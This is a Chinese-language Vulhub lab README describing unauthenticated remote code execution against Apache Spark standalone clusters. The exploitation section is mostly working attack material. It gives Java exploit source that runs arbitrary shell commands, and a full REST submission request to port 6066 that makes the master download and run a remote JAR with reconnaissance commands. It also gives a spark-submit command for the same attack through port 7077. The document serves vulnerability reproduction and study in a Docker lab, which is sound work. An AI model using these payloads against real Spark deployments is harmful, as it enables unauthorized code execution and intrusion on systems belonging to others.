Files
vulhub/spark/unacc/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

130 lines
4.2 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache Spark 未授权访问导致远程代码执行
Apache Spark是一款集群计算系统其支持用户向管理节点提交应用并分发给集群执行。如果管理节点未启动ACL访问控制我们将可以在集群中执行任意代码。
参考链接:
- https://weibo.com/ttarticle/p/show?id=2309404187794313453016
- https://xz.aliyun.com/t/2490
## 漏洞环境
执行如下命令将以standalone模式启动一个Apache Spark集群集群里有一个master与一个slave
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可看到master的管理页面访问`http://your-ip:8081`即可看到slave的管理页面。
## 漏洞利用
该漏洞本质是未授权的用户可以向管理节点提交一个应用,这个应用实际上是恶意代码。
提交方式有两种:
1. 利用REST API
2. 利用submissions网关集成在7077端口中
应用可以是Java或Python就是一个最简单的类参考链接1
```java
import java.io.BufferedReader;
import java.io.InputStreamReader;
public class Exploit {
public static void main(String[] args) throws Exception {
String[] cmds = args[0].split(",");
for (String cmd : cmds) {
System.out.println(cmd);
System.out.println(executeCommand(cmd.trim()));
System.out.println("==============================================");
}
}
// https://www.mkyong.com/java/how-to-execute-shell-command-from-java/
private static String executeCommand(String command) {
StringBuilder output = new StringBuilder();
try {
Process p = Runtime.getRuntime().exec(command);
p.waitFor();
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
output.append(line).append("\n");
}
} catch (Exception e) {
e.printStackTrace();
}
return output.toString();
}
}
```
将其编译成JAR放在任意一个HTTP或FTP上`https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar`
### 用REST API方式提交应用
standalone模式下master将在6066端口启动一个HTTP服务器我们向这个端口提交REST格式的API
```
POST /v1/submissions/create HTTP/1.1
Host: your-ip:6066
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/json
Connection: close
Content-Length: 680
{
"action": "CreateSubmissionRequest",
"clientSparkVersion": "2.3.1",
"appArgs": [
"whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
],
"appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
"environmentVariables": {
"SPARK_ENV_LOADED": "1"
},
"mainClass": "Exploit",
"sparkProperties": {
"spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
"spark.driver.supervise": "false",
"spark.app.name": "Exploit",
"spark.eventLog.enabled": "true",
"spark.submit.deployMode": "cluster",
"spark.master": "spark://your-ip:6066"
}
}
```
其中,`spark.jars`即是编译好的应用mainClass是待运行的类appArgs是传给应用的参数。
![](1.png)
返回的包中有submissionId然后访问`http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout`,即可查看执行结果:
![](2.png)
注意提交应用是在master中查看结果是在具体执行这个应用的slave里默认8081端口。实战中由于slave可能有多个。
### 利用submissions网关
如果6066端口不能访问或做了权限控制我们可以利用master的主端口7077来提交应用。
方法是利用Apache Spark自带的脚本`bin/spark-submit`
```
bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id
```
如果你指定的master参数是rest服务器这个脚本会先尝试使用rest api来提交应用如果发现不是rest服务器则会降级到使用submission gateway来提交应用。
查看结果的方式与前面一致。